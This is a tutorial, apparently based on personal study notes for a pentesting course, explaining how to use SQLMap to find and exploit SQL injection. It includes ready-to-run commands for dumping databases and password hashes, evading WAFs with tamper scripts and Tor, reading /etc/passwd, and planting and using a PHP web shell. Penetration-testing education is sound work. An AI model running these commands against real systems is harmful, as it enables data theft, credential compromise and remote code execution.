SQLMap Overview

SQLMap is an open source penetration testing tool written in Python that automates SQL injection detection and exploitation. It connects to a target, probes parameters, fingerprints the back-end DBMS, and then enumerates data or attempts deeper impact. The tool is designed to speed up SQLi workflows while still providing the evidence you need for reporting.

SQLMap covers the full exploitation chain in one interface. It can enumerate databases, tables, columns, and users, extract data, and even interact with the file system when the DBMS allows it. It also has features for proxying traffic, adjusting risk, and bypassing common defenses.

Installation and Quick Start

SQLMap is commonly preinstalled in security-focused environments, but you can install it from package managers or clone the repository. On Debian systems, a simple apt install sqlmap is enough to get a working binary. If you want the latest version, clone the project and run it with Python.

sudo apt install sqlmap

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
python sqlmap.py -h

For a minimal test, give SQLMap a vulnerable URL and let it run in batch mode so it does not stop for prompts. This is the fastest way to verify if the parameter is injectable and if the target is stable. When the tool asks questions, hitting Enter to accept defaults is often fine for the first pass.

sqlmap -u "http://www.example.com/vuln.php?id=1" --batch

Supported DBMS and SQLi Techniques

SQLMap supports a wide range of DBMS engines, including MySQL, PostgreSQL, Oracle, Microsoft SQL Server, SQLite, and many others. This matters because it can tune payloads and output parsing based on the detected platform. It also uses DBMS-specific tricks to improve reliability once it identifies the engine.

The tool can detect and exploit multiple SQLi techniques. The short technique set shown by sqlmap -hh includes B for boolean-based, E for error-based, U for UNION-based, S for stacked queries, T for time-based, and Q for inline queries. It also supports out-of-band techniques when configured with a DNS domain. You can force or limit techniques when you need a tighter scope.

sqlmap -hh

sqlmap -u "URL" --technique=BEU

Interpreting SQLMap Output

SQLMap prints messages that help you understand the target response behavior. If it reports that content is stable, it can more reliably measure changes caused by injection. When a parameter is dynamic, it means the response changes with the parameter, which is a good sign for SQLi testing. Heuristic warnings suggest possible injection, but you should wait for a confirmed message before assuming it is exploitable.

Key output messages also show how SQLMap adapts. When it identifies the DBMS, it can skip irrelevant payloads, which speeds up testing. It may ask to extend the default level and risk to run more aggressive checks. If you see a confirmed injection type, note it in your report along with the parameter name, and remember SQLMap logs extracted data locally for evidence.

Building Requests for SQLMap

A correct request is the foundation of reliable SQLMap testing. The simplest case is a GET parameter in the URL, which you pass with -u. For POST parameters, use --data, and either specify a parameter with -p or mark it with * in the body. For complex requests, use -r with a raw HTTP request file from Burp.

sqlmap -u "http://www.example.com/?id=1" --batch

sqlmap "http://www.example.com/" --data "uid=1*&name=test"

sqlmap -r req.txt

If you need headers, cookies, or custom methods, SQLMap supports them directly. Use --cookie or -H to set session values, and --method to switch from GET or POST. For JSON bodies, set Content-Type: application/json and pass JSON in --data, usually with -p to target a specific field.

sqlmap -u "http://TARGET/" --data '{"id":1}' --headers "Content-Type: application/json" -p id --dbs

sqlmap -u www.target.com --data="id=1" --method PUT

When the target uses cookies or custom headers, copy the request from your browser or proxy. A cookie-only attack is common when the session value is used in a query. This keeps the test controlled and reduces time spent on unrelated parameters.

sqlmap 'http://83.136.253.132:57684/case3.php' --cookie="id=1" -p id --dbs

Controlling Noise and Errors

SQLMap offers options to help you interpret failures and reduce confusion. If you suspect DBMS errors are being hidden, use --parse-errors so the tool prints them in output. If you want raw evidence of traffic, the -t flag saves all requests and responses to a file.

sqlmap -u "http://www.target.com/vuln.php?id=1" --parse-errors

sqlmap -u "http://www.target.com/vuln.php?id=1" --batch -t /tmp/traffic.txt

Verbosity helps when you need to see payloads or understand detection logic. Increase verbosity with -v, and use -v 3 or higher to display payload details. If you want to inspect the traffic in Burp, use --proxy to route SQLMap through your proxy.

sqlmap -u "http://www.target.com/vuln.php?id=1" -v 6 --batch

sqlmap -u "http://www.target.com/vuln.php?id=1" --proxy="http://127.0.0.1:8080"

Attack Tuning and Technique Control

SQLMap builds payloads from a vector plus a prefix and suffix, and sometimes you need to override those parts. The --prefix and --suffix options let you fit SQLMap into awkward query patterns. Use it sparingly and confirm the resulting SQL is valid.

sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -"

Risk and level allow you to widen the test set. --level increases the number of payloads and boundaries, while --risk increases aggressive vectors that could affect stability. A higher level often helps on tough filters, but it can also increase traffic.

sqlmap -u www.example.com/?id=1 -v 3 --level=5 --risk=3

SQLMap can also lock on response features. Use --code if HTTP status codes separate true and false responses, --titles if changes appear in the page title, and --string when a specific keyword indicates success. --text-only reduces HTML noise by comparing visible text.

sqlmap -u "http://www.example.com/?id=1" --string="success" --text-only

sqlmap -u "http://www.example.com/?id=1" --technique=BEU

Database Enumeration Workflow

Enumeration starts after SQLMap confirms injection. Begin with basic database metadata like banner, current user, current database, and DBA privileges. These details help you assess impact and determine which direction to take next.

sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba

Next, list tables in a specific database, then dump the table you care about. Use -D to select the database and -T for the table. If you only need certain columns, add -C to avoid dumping everything.

sqlmap -u "http://www.example.com/?id=1" --tables -D testdb

sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname

If you need to target specific rows, apply a WHERE clause. SQLMap lets you set --where to restrict output. For full dumps, use --dump without -T or --dump-all to cover everything, and consider --exclude-sysdbs to avoid system databases.

sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name LIKE 'f%'"

sqlmap -u "http://victima.com/vuln.php?id=1" --dump-all --exclude-sysdbs

Advanced Enumeration and Searching

For a full schema view, use --schema to map all tables and columns. This is valuable when you want a structural snapshot before extracting data. SQLMap can also search for tables or columns by name using --search with -T or -C.

sqlmap -u "http://www.example.com/?id=1" --schema

sqlmap -u "http://www.example.com/?id=1" --search -T user

When you suspect DB credentials are stored in system tables, try --passwords. SQLMap will attempt to extract DB user hashes and may crack them if supported. This is sensitive data, so limit it to authorized testing scopes. Keep all extracted data in the SQLMap output folder for evidence.

sqlmap -u "http://www.example.com/?id=1" --passwords --batch

Bypassing Protections and Evasion

Modern applications often use anti-CSRF tokens or unique parameters. SQLMap can update CSRF tokens automatically when you specify the parameter name with --csrf-token, and --randomize can keep per-request values unique. When a parameter is calculated from another field, --eval lets you compute a value before each request is sent.

sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=<token>" --csrf-token="csrf-token"

sqlmap -u "http://www.example.com/?id=1&rp=29125" --randomize=rp --batch

If IP blocking or geo filters interfere, route through a proxy with --proxy or a list via --proxy-file. SQLMap can also use Tor with --tor and verify routing with --check-tor when available. If WAF detection causes noise, use --skip-waf and consider --random-agent.

sqlmap -u "http://objetivo.com/vuln.php?id=1" --proxy="socks4://177.39.187.70:33283"

sqlmap -u "http://objetivo.com/vuln.php?id=1" --skip-waf --random-agent

Tamper scripts are one of the most powerful bypass tools. They modify payloads before sending them to evade signature filters. You can chain scripts with --tamper, and SQLMap applies them in a priority order.

sqlmap -u "http://objetivo.com/vuln.php?id=1" --tamper=between

sqlmap -u "http://objetivo.com/vuln.php?id=1" --tamper=between,randomcase

Additional evasion options include --chunked, which splits POST bodies into chunks, and --hpp, which spreads payloads across repeated parameters. These can bypass naive signature checks but are not always supported by every server stack. Test responses carefully because some stacks ignore these encodings.

sqlmap -u "http://objetivo.com/vuln.php" --data="id=1" --chunked

sqlmap -u "http://objetivo.com/vuln.php?id=1" --hpp

Operating System Access

SQLMap can go beyond the database when privileges allow. Start by checking DBA privileges with --is-dba to see if high-privilege actions are possible. If you can read files, use --file-read to pull system files and verify the content in the SQLMap output directory.

sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba

sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"

If the DBMS allows file writing, SQLMap can upload a web shell with --file-write and --file-dest. This is powerful and should only be used in controlled tests with explicit permission. You can also try --os-shell to get a basic command shell without manual file writing.

echo '<?php system($_GET["cmd"]); ?>' > shell.php
sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"

curl "http://www.example.com/shell.php?cmd=ls+-la"

sqlmap -u "http://www.example.com/?id=1" --os-shell --technique=E

Reference

This article is based on my personal study notes from the Information Security Foundations track.

Full repository: https://github.com/lameiro0x/pentesting-path-htb